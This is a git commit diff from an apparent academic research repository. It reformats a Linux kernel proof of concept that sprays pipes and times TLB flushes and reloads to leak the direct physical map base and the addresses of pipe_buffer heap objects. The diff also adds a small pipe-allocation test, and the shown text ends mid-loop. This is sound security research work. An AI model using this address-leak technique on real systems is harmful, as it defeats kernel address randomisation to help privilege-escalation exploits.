alloc pipes

2025-04-03 23:07:30 +02:00 · 2025-04-03 23:07:30 +02:00 · e700ab4b60
commit e700ab4b60
parent 4d08c68e78
2 changed files with 278 additions and 222 deletions
--- a/code/leak.c
+++ b/code/leak.c
@ -1,4 +1,19 @@
 #include <sys/socket.h>
 #include <fcntl.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 // where does this come from?
 #define OBJS_PER_SLAB 42
 #define PIPE_BUFFER   (OBJS_PER_SLAB * 10)
 int pipes[PIPE_BUFFER][2];
 void alloc_pipes(int[2], int);
 int
 main(void)
@ -8,6 +23,16 @@ main(void)
 	printf("main: fopen: %p\n", device);
 	for (size_t i = 0; i < PIPE_BUFFER; i++) {
 		alloc_pipes(pipes[i], O_NONBLOCK);
 	}
 	fclose(device);
 	printf("main: done\n");
 }
 void
 alloc_pipes(int fd[2], int flags)
 {
 	pipe2(pipes, flags);
 }
--- a/paper/artifacts/heap/pipe_buffer_leak.c
+++ b/paper/artifacts/heap/pipe_buffer_leak.c
@ -1,16 +1,17 @@
 #include "utils.h"
 #include "cacheutils.h"
 #include "tlb_flush.h"
 #include "pipe_buffer.h"
 #include "coarse_grain_leak.h"
 #include "pipe_buffer.h"
 #include "tlb_flush.h"
 #include "utils.h"
 #define VALIDATE
 #ifdef VALIDATE
 #include "ulkm.h"
 #endif
 #include <unistd.h>
 #include <sys/syscall.h>
 #include <sys/socket.h>
 #include <sys/mman.h>
 #include <sys/socket.h>
 #include <sys/syscall.h>
 #include <unistd.h>
 #define IPPROTO_DCCP	  33
 #define IPPROTO_SCTP	  132
 #define IPPROTO_L2TP	  115
@ -30,7 +31,9 @@ int pipes_spray[PIPE_BUFFER_SPRAY][2];
 int pipes[PIPE_BUFFER][2];
 char buffer[0x1000];
-void get_times(int fd, size_t addr, size_t tries, size_t *time, size_t *time_n2, size_t *time_n4)
+void
 get_times(int fd, size_t addr, size_t tries, size_t *time, size_t *time_n2,
    size_t *time_n4)
 {
 	size_t times[tries];
 	size_t times_n2[tries];
@ -39,7 +42,8 @@ void get_times(int fd, size_t addr, size_t tries, size_t *time, size_t *time_n2,
 		flush_tlb_targeted_4k(addr);
 		flush_tlb_targeted_4k(addr + 2 * (1 << 12));
 		flush_tlb_targeted_4k(addr + 2 * (1 << 12));
-        __attribute__((unused))int __ret = read(fd, (void *)0xdeadbeef000, 8);
+		__attribute__((unused)) int __ret = read(fd,
 		    (void *)0xdeadbeef000, 8);
 		times[i] = onlyreload(addr);
 		times_n2[i] = onlyreload(addr + 2 * (1 << 12));
 		times_n4[i] = onlyreload(addr + 4 * (1 << 12));
@ -51,7 +55,8 @@ void get_times(int fd, size_t addr, size_t tries, size_t *time, size_t *time_n2,
 	*time_n2 = times_n2[tries / 4];
 	*time_n4 = times_n4[tries / 4];
 }
-int is_2mb(int fd, size_t addr, size_t tries)
+int
 is_2mb(int fd, size_t addr, size_t tries)
 {
 	size_t time;
 	size_t time_n2;
@ -59,16 +64,19 @@ int is_2mb(int fd, size_t addr, size_t tries)
 	get_times(fd, addr, tries, &time, &time_n2, &time_n4);
 	return (time < THRESHOLD && time_n2 < THRESHOLD && time_n4 < THRESHOLD);
 }
-int hit_flush(int fd, size_t addr, size_t tries)
+int
 hit_flush(int fd, size_t addr, size_t tries)
 {
 	size_t time;
 	size_t time_n2;
 	size_t time_n4;
 	get_times(fd, addr, tries, &time, &time_n2, &time_n4);
-    return (time < THRESHOLD && (time_n2 > THRESHOLD || time_n4 > THRESHOLD));
+	return (
 	    time < THRESHOLD && (time_n2 > THRESHOLD || time_n4 > THRESHOLD));
 }
-int main(void)
+int
 main(void)
 {
 	printf("[*] start\n");
 	set_limit();
@ -178,24 +186,35 @@ int main(void)
 	printf("[*] pipe_buffer 21 %016zx\n", pipe_buffer_21);
 	lkm_pipe_buffer_leak((size_t)&pipe_buffer_40, pipes[40][0], 1);
 	printf("[*] pipe_buffer 40 %016zx\n", pipe_buffer_40);
-    lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns1, pipes[OBJS_PER_SLAB][0], 1);
+	lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns1, pipes[OBJS_PER_SLAB][0],
 	    1);
 	printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB, pipe_buffer_ns1);
-    lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns2, pipes[OBJS_PER_SLAB*2][0], 1);
+	lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns2,
-    printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB*2, pipe_buffer_ns2);
+	    pipes[OBJS_PER_SLAB * 2][0], 1);
-    lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns3, pipes[OBJS_PER_SLAB*3][0], 1);
+	printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB * 2,
-    printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB*3, pipe_buffer_ns3);
+	    pipe_buffer_ns2);
-    lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns4, pipes[OBJS_PER_SLAB*4][0], 1);
+	lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns3,
-    printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB*4, pipe_buffer_ns4);
+	    pipes[OBJS_PER_SLAB * 3][0], 1);
-    lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns5, pipes[OBJS_PER_SLAB*5][0], 1);
+	printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB * 3,
-    printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB*5, pipe_buffer_ns5);
+	    pipe_buffer_ns3);
 	lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns4,
 	    pipes[OBJS_PER_SLAB * 4][0], 1);
 	printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB * 4,
 	    pipe_buffer_ns4);
 	lkm_pipe_buffer_leak((size_t)&pipe_buffer_ns5,
 	    pipes[OBJS_PER_SLAB * 5][0], 1);
 	printf("[*] pipe_buffer %d %016zx\n", OBJS_PER_SLAB * 5,
 	    pipe_buffer_ns5);
 	size_t is_4kb = lkm_is_4kb(pipe_buffer_0);
-    printf("[*] %016zx is %s page\n", pipe_buffer_0, is_4kb ? "4kB" : "2MB");
+	printf("[*] %016zx is %s page\n", pipe_buffer_0,
 	    is_4kb ? "4kB" : "2MB");
 #endif
 	size_t dpm_base = dpm_leak(TRIES);
 	printf("[*] dpm_base: %016zx\n", dpm_base);
-    for (size_t addr = dpm_base; addr < dpm_base+mem_total_rounded; addr += (1<<21)) {
+	for (size_t addr = dpm_base; addr < dpm_base + mem_total_rounded;
 	    addr += (1 << 21)) {
 		if ((addr % (1 << 30)) == 0)
 			printf("[*] addr %016zx\n", addr);
@ -203,42 +222,54 @@ int main(void)
 			continue;
 		for (size_t i = 0; i < (1ULL << 21); i += (1ULL << 12)) {
 			size_t cur_addr = addr + i;
-            size_t found_0 = hit_flush(pipes[0][0], cur_addr, TRIES);
+			size_t found_0 = hit_flush(pipes[0][0], cur_addr,
 			    TRIES);
 			if (!found_0)
 				continue;
-            size_t found_ns1 = hit_flush(pipes[OBJS_PER_SLAB][0], cur_addr, TRIES);
+			size_t found_ns1 = hit_flush(pipes[OBJS_PER_SLAB][0],
 			    cur_addr, TRIES);
 			if (found_ns1)
 				continue;
-            size_t found_ns2 = hit_flush(pipes[OBJS_PER_SLAB*2][0], cur_addr, TRIES);
+			size_t found_ns2 = hit_flush(
 			    pipes[OBJS_PER_SLAB * 2][0], cur_addr, TRIES);
 			if (found_ns2)
 				continue;
-            size_t found_ns3 = hit_flush(pipes[OBJS_PER_SLAB*3][0], cur_addr, TRIES);
+			size_t found_ns3 = hit_flush(
 			    pipes[OBJS_PER_SLAB * 3][0], cur_addr, TRIES);
 			if (found_ns3)
 				continue;
-            size_t found_ns4 = hit_flush(pipes[OBJS_PER_SLAB*4][0], cur_addr, TRIES);
+			size_t found_ns4 = hit_flush(
 			    pipes[OBJS_PER_SLAB * 4][0], cur_addr, TRIES);
 			if (found_ns4)
 				continue;
-            size_t found_ns5 = hit_flush(pipes[OBJS_PER_SLAB*5][0], cur_addr, TRIES);
+			size_t found_ns5 = hit_flush(
 			    pipes[OBJS_PER_SLAB * 5][0], cur_addr, TRIES);
 			if (found_ns5)
 				continue;
-            size_t found_1 = hit_flush(pipes[1][0], cur_addr, TRIES);
+			size_t found_1 = hit_flush(pipes[1][0], cur_addr,
 			    TRIES);
 			if (!found_1)
 				continue;
-            size_t found_2 = hit_flush(pipes[2][0], cur_addr, TRIES);
+			size_t found_2 = hit_flush(pipes[2][0], cur_addr,
 			    TRIES);
 			if (!found_2)
 				continue;
-            size_t found_3 = hit_flush(pipes[3][0], cur_addr, TRIES);
+			size_t found_3 = hit_flush(pipes[3][0], cur_addr,
 			    TRIES);
 			if (!found_3)
 				continue;
-            size_t found_21 = hit_flush(pipes[21][0], cur_addr, TRIES);
+			size_t found_21 = hit_flush(pipes[21][0], cur_addr,
 			    TRIES);
 			if (!found_21)
 				continue;
-            size_t found_40 = hit_flush(pipes[40][0], cur_addr, TRIES);
+			size_t found_40 = hit_flush(pipes[40][0], cur_addr,
 			    TRIES);
 			if (!found_40)
 				continue;
-            size_t found_39 = hit_flush(pipes[39][0], cur_addr, TRIES);
+			size_t found_39 = hit_flush(pipes[39][0], cur_addr,
 			    TRIES);
 			if (!found_39)
 				continue;